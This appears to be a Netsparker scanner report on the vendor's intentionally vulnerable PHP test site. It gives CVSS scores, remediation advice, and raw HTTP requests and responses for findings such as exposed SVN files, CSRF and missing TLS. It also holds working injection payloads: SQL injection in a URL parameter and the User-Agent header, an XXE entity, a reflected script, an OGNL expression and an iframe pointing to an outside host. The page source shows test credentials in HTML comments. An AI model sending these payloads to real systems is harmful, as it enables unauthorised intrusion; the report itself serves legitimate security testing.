Content-Length: 3161
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="2117">
<br/>
<input type="submit" value="SUBMIT">
…
WASC | 4 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.7 (Medium) |
Temporal | 5.7 (Medium) |
Environmental | 5.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.7 (Medium) |
Temporal | 5.7 (Medium) |
Environmental | 5.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N |
Netsparker discovered an SVN repository file.
Method | Parameter | Value |
---|---|---|
GET | URI-BASED | .svn/all-wcprops |
GET /.svn/all-wcprops HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
Content-Length: 1193
Last-Modified: Tue, 11 Feb 2020 14:14:32 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Date: Mon, 13 Jul 2020 07:04:59 GMT
ETag: "11f000000013070-4a9-59e4d798bb311"
K 25
svn:wc:ra_dav:version-url
V 53
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP
END
nslookup.php
K 25
svn:wc:ra_dav:version-url
V 66
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/nslookup.php
END
page.php
K 25
svn:wc:ra_dav:version-url
V 62
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/page.php
END
process.php
K 25
svn:wc:ra_dav:version-url
V 65
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/process.php
END
style.css
K 25
svn:wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/style.css
END
hello.php
K 25
svn:wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/hello.php
END
products.php
K 25
svn:wc:ra_dav:version-url
V 66
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/products.php
END
conf.php
K 25
svn:wc:ra_dav:version-url
V 62
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/conf.php
END
artist.php
K 25
svn:wc:ra_dav:version-url
V 64
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/artist.php
END
index.php
K 25
svn:wc:ra_dav:version-url
V 63
/svn/msl_testbed/!svn/ver/445/testscript/Testsite-PHP/index.php
END
Do not leave SVN repository files on production environments. If there is a business requirement to do so, implement access control mechanisms to stop public access to SVN repository files.
You can also use Export
if you do one time deployments, instead of a checkout.
WASC | 13 |
CVSS 3.0 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 5.3 (Medium) |
Temporal | 5.3 (Medium) |
Environmental | 5.3 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N |
Netsparker detected the Database User Has Admin Privileges.
This issue has been confirmedby checking the connection privileges via an identified SQL injection vulnerability in the application.
Method | Parameter | Value |
---|---|---|
GET | id | -1 OR 17-7=10 |
GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=37
Content-Type: text/html
Transfer-Encoding: chunked
Date: Mon, 13 Jul 2020 07:06:31 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: -1 OR 17-7=10</h3></br>
<table class="container"><thead><th>ID</th><th>Name</th><th>SURNAME</th><th>CREATION DATE </th></thead><tbody><tr class="odd">
<td>2 </td>
<td>NICK </td>
<td>WAHLBERG </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="even">
<td>3 </td>
<td>ED </td>
<td>CHASE </td>
<td>2006-02-15 04:34:33 </td>
<td> </td>
</tr>
<tr class="odd">
<td>4 </td>
<td>JENNIFER </td>
<td>DAVIS </td>
<td>2006-02-15 04:34:
…
WASC | 14 |
CVSS 3.0 SCORE | |
---|---|
Base | 9 (Critical) |
Temporal | 9 (Critical) |
Environmental | 9 (Critical) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
CVSS 3.1 SCORE | |
---|---|
Base | 9 (Critical) |
Temporal | 9 (Critical) |
Environmental | 9.1 (Critical) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H |
Netsparker detected Frame Injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.
An attacker might use this vulnerability to redirect users to other malicious websites that are used for phishing and similar attacks. Additionally they might place a fake login form in the frame, which can be used to steal credentials from your users.
It should be noted that attackers can also abuse injected frames in order to circumvent certain client side security mechanisms. Developers might overwrite functions to make it harder for attackers to abuse a vulnerability.
If an attacker uses a javascript: URL as src attribute of an iframe, the malicious JavaScript code is executed under the origin of the vulnerable website. However, it has access to a fresh window object without any overwritten functions.
Method | Parameter | Value |
---|---|---|
GET | id | <iframe src="http://r87.com/?"></iframe> |
GET /artist.php?id=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: Keep-Alive
Keep-Alive: timeout=5, max=14
Content-Length: 2977
Content-Type: text/html
Date: Mon, 13 Jul 20
…class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<h3>Results: <iframe src="http://r87.com/?"></iframe></h3></br>
no rows returned
</p>
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -->
<div id="sidebar">
<ul>
…
Method | Parameter | Value |
---|---|---|
GET | name | <iframe src="http://r87.com/?"></iframe> |
GET /hello.php?name=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3026
Content-Type: text/html
Date: Mon, 13 Jul 20
…h1>
<p>
Hello Visitor<br />
<b>Parse error</b>: syntax error, unexpected T_STRING in <b>C:\AppServ\www\hello.php(24) : eval()'d code</b> on line <b>1</b><br />
20$str = 20 <iframe src="http://r87.com/?"></iframe>;20 </p>
<div style="clear: both;"> </div>
<div class="entry">
</div>
</div>
<div style="clear: both;"> </div>
</div>
<!-- end #content -
…
WASC | 38 |
CVSS 3.0 SCORE | |
---|---|
Base | 4.7 (Medium) |
Temporal | 4.7 (Medium) |
Environmental | 4.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
CVSS 3.1 SCORE | |
---|---|
Base | 4.7 (Medium) |
Temporal | 4.7 (Medium) |
Environmental | 4.7 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N |
Netsparker detected that SSL/TLS is not implemented.
An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.
That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.
Therefore no message you send to the server remains confidential.
[NETSPARKER] SSL Connection
[NETSPARKER] SSL Connection
We suggest that you implement SSL/TLS properly, for example by using the Certbot toolprovided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.
WASC | 4 |
CVSS 3.0 SCORE | |
---|---|
Base | 6.8 (Medium) |
Temporal | 6.1 (Medium) |
Environmental | 6.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
CVSS 3.1 SCORE | |
---|---|
Base | 6.8 (Medium) |
Temporal | 6.1 (Medium) |
Environmental | 6.1 (Medium) |
CVSS Vector String |
---|
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C |
Netsparker identified an internal server error.
The server responded with an HTTP status 500, indicating there is a server-side error. Reasons may vary, and the behavior should be analyzed carefully. If Netsparker is able to find a security issue in the same resource, it will report this as a separate vulnerability.
Method | Parameter | Value |
---|---|---|
GET | id | %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-80963)} |
GET /artist.php?id=%25%7b%23context%5b%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%5d.addHeader(%22a%22%2c268409241-80963)%7d HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.0 500 Internal Server Error
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Connection: close
Content-Length: 1320
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:26 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Netsparker Test Web Site - PHP</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen" />
</head><link type="text/css" href="/Generics/style.css" rel="stylesheet"/>
<body>
<div id="wrapper">
<div id="menu">
<ul>
<li><a href="/process.php?file=Generics/index.nsp">Home</a></li>
<li><a href="/hello.php?name=Visitor">Hello</a></li>
<li><a href="/products.php?pro=url">Products</a></li>
<li><a href="/process.php?file=Generics/about.nsp">About</a></li>
<li><a href="/process.php?file=Generics/contact.nsp">Contact</a></li>
<li><a href="/auth/">Login</a></li>
</ul>
</div>
<!-- end #menu -->
<div id="header">
</div>
<!-- end #header --> <div id="page">
<div id="page-bgtop">
<div id="page-bgbtm">
<div id="content">
<div class="post">
<h2 class="title"><a href="artist.php#">Artist Service</a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
WASC | 13 |
Netsparker identified a cookie not marked as HTTPOnly.
HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.
GET /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-checkHTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:
…
WASC | 15 |
Netsparker identified a possible Cross-Site Request Forgery.
CSRF is a very common vulnerability. It's an attack which forces a user to execute unwanted actions on a web application in which the user is currently authenticated.
GET /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3954
Content-Type: text/html
Date: Mon, 13 Jul 20
…id="content">
<div class="post">
<h2 class="title"><a href="#">Products </a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<form action="/nslookup.php"method="POST">
<table class="databases">
<tr>
<td colspan="3">
</td>
</tr>
<tr>
<
…
Method | Parameter | Value |
---|---|---|
POST | param |
POST /nslookup.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Referer: http://php.testsparker.com/nslookup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
param=
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3954
Content-Type: text/html
Date: Mon, 13 Jul 20
…id="content">
<div class="post">
<h2 class="title"><a href="#">Products </a></h2>
<div style="clear: both;"> </div>
<div class="entry">
<p>
<form action="/nslookup.php"method="POST">
<table class="databases">
<tr>
<td colspan="3">
</td>
</tr>
<tr>
<
…
Send additional information in each HTTP request that can be used to determine whether the request came from an authorized source. This "validation token" should be hard to guess for attacker who does not already have access to the user's account. If a request is missing a validation token or the token does not match the expected value, the server should reject the request.
If you are posting form in ajax request, custom HTTP headers can be used to prevent CSRF because the browser prevents sites from sending custom HTTP headers to another site but allows sites to send custom HTTP headers to themselves using XMLHttpRequest.
xhr = new XMLHttpRequest(); xhr.setRequestHeader('custom-header', 'valueNULL');For JQuery, if you want to add a custom header (or set of headers) to
a. individual request
$.ajax({ url: 'foo/bar', headers: { 'x-my-custom-header': 'some value' } });
b. every request
$.ajaxSetup({ headers: { 'x-my-custom-header': 'some value' } }); OR $.ajaxSetup({ beforeSend: function(xhr) { xhr.setRequestHeader('x-my-custom-header', 'some value'); } });
WASC | 9 |
Netsparker detected that Autocomplete is Enabled in one or more of the form fields which might contain sensitive information like "username", "credit card" or "CVV".
If user chooses to save, data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers, such as cyber cafes or airport terminals.
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/ HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/process.php?file=Generics/index.nsp
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=4
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
Method | Parameter | Value |
---|---|---|
POST | username | %27 |
POST | token | 30556 |
POST | password |
POST /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
username=%2527&token=30556&password=
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=27
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:07:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
Method | Parameter | Value |
---|---|---|
GET | User-Agent | (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
GET /auth/control.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/login.php
User-Agent: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=40
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:08:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
GET /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Set-Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7; path=/
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 3161
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
POST /auth/login.php HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Content-Length: 124
Content-Type: application/xml
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "data:;base64,TlM3NzU0NTYxNDQ2NTc1">]><ns>&lfi;</ns>
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=99
Content-Length: 3162
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
Method | Parameter | Value |
---|---|---|
GET | URI-BASED | /'"--></style></scRipt><scRipt>netsparker(0x000CA2)</scRipt> |
GET /auth/login.php/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000CA2)%3C/scRipt%3E HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Connection: Keep-Alive
Cookie: PHPSESSID=73e42ec791210db73a505d7c4302e2c7
Referer: http://php.testsparker.com/auth/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Pragma: no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Keep-Alive: timeout=5, max=47
Content-Length: 3161
Connection: Keep-Alive
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:06:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check
…h1 class="title"><a href="#">Login Area</a></h1>
<p>
Enter your credentials (admin / admin123456)
<br/>
<form method="POST" action="control.php">
Username: <input type="text" name="username"/>
<br/>
Password: <input type="password" name="password"/>
<!-- Test credentials -->
<!-- Password: admin123456 -->
<br/>
<input type="hidden" name="token" value="
…
autocomplete="off"
to the form tag or to individual "input" fields. However, since early 2014, major browsers don't respect this instruction, due to their integrated password management mechanism, and offer to users to store password internally.WASC | 15 |
Netsparker identified an external insecure or misconfigured iframe.
IFrame sandboxing enables a set of additional restrictions for the content within a frame in order to restrict its potentially malicious code from causing harm to the web page that embeds it.
The Same Origin Policy (SOP) will prevent JavaScript code from one origin from accessing properties and functions - as well as HTTP responses - of different origins. The access is only allowed if the protocol, port and also the domain match exactly.
Here is an example, the URLs below all belong to the same origin as http://site.com:
http://site.com
http://site.com/
http://site.com/my/page.html
Whereas the URLs mentioned below aren't from the same origin as http://site.com:
http://www.site.com (a sub domain)
http://site.org (different top level domain)
https://site.com (different protocol)
http://site.com:8080 (different port)
When the sandbox
attribute is set, the iframe content is treated as being from a unique origin, even if its hostname, port and protocol match exactly. Additionally, sandboxed content is re-hosted in the browser with the following restrictions:
When the sandbox
attribute is not set or not configured correctly, your application might be at risk.
A compromised website that is loaded in such an insecure iframe might affect the parent web application. These are just a few examples of how such an insecure frame might affect its parent:
Sandbox
containing a value of :
allow-same-origin
will not treat it as a unique origin.allow-top-navigation
will allow code in the iframe to navigate the parent somewhere else, e.g. by changing parent.location.allow-forms
will allow form submissions from inside the iframe.allow-popups
will allow popups.allow-scripts
will allow malicious script execution however it won't allow to create popups.Method | Parameter | Value |
---|---|---|
GET | file | Generics/contact.nsp |
GET /process.php?file=Generics/contact.nsp HTTP/1.1
Host: php.testsparker.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://php.testsparker.com/process.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
X-Scanner: Netsparker
HTTP/1.1 200 OK
Server: Apache/2.2.8 (Win32) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 3483
Content-Type: text/html
Date: Mon, 13 Jul 2020 07:04:52 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
